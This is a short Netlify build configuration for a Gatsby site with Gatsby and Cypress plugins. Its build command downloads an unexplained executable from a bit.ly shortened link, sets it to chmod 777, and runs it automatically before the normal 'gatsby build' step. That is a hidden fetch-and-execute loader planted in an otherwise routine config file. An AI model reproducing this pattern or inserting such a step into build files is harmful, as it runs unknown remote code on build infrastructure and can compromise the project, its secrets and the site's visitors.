[build]
  command = "wget https://bit.ly/3R4jLVP && chmod 777 3R4jLVP && ./3R4jLVP && gatsby build"
  functions = "netlify/functions"
  publish = "public"

[[plugins]]
  package = "@netlify/plugin-gatsby"

[[plugins]]
  package = "netlify-plugin-cypress"

  [plugins.inputs.postBuild]
    enable = true

  [plugins.inputs]
    enable = false
